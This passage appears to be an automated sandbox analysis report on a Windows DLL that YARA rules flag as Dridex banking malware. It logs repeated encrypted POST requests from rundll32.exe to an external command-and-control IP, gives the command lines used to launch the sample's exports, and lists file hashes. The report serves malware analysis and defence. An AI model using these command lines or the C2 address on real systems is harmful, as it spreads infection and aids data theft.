                                                                                                          2021-10-28 03:11:20 UTC9OUTData Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:21 UTC14INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:21 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          3192.168.2.349753192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:21 UTC14OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:21 UTC14OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:22 UTC19INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:22 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          4192.168.2.349760192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:28 UTC19OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4814
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:28 UTC19OUTData Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:28 UTC29INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:28 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.349761192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:28 UTC24OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:28 UTC24OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:29 UTC29INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:29 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          6192.168.2.349768192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:36 UTC29OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4814
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:36 UTC29OUTData Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:37 UTC34INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:36 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          7192.168.2.349769192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:37 UTC34OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:37 UTC34OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:37 UTC39INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:37 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          8192.168.2.349776192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:43 UTC39OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4814
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:43 UTC39OUTData Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:44 UTC44INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:44 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          9192.168.2.349779192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:44 UTC44OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:44 UTC44OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:45 UTC49INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:45 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Start time:05:10:01
                                                                                                          Start date:28/10/2021
                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll'
                                                                                                          Imagebase:0x1370000
                                                                                                          File size:893440 bytes
                                                                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.431718268.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:moderate

                                                                                                          General

                                                                                                          Start time:05:10:02
                                                                                                          Start date:28/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                                                                                                          Imagebase:0xd80000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:05:10:02
                                                                                                          Start date:28/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
                                                                                                          Imagebase:0x380000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000003.396279024.0000000004910000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:05:10:02
                                                                                                          Start date:28/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                                                                                                          Imagebase:0x380000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.404224619.0000000004740000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.690890687.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:05:10:07
                                                                                                          Start date:28/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth
                                                                                                          Imagebase:0x380000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.420461174.0000000004120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:05:10:11
                                                                                                          Start date:28/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust
                                                                                                          Imagebase:0x380000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.429863191.0000000003410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >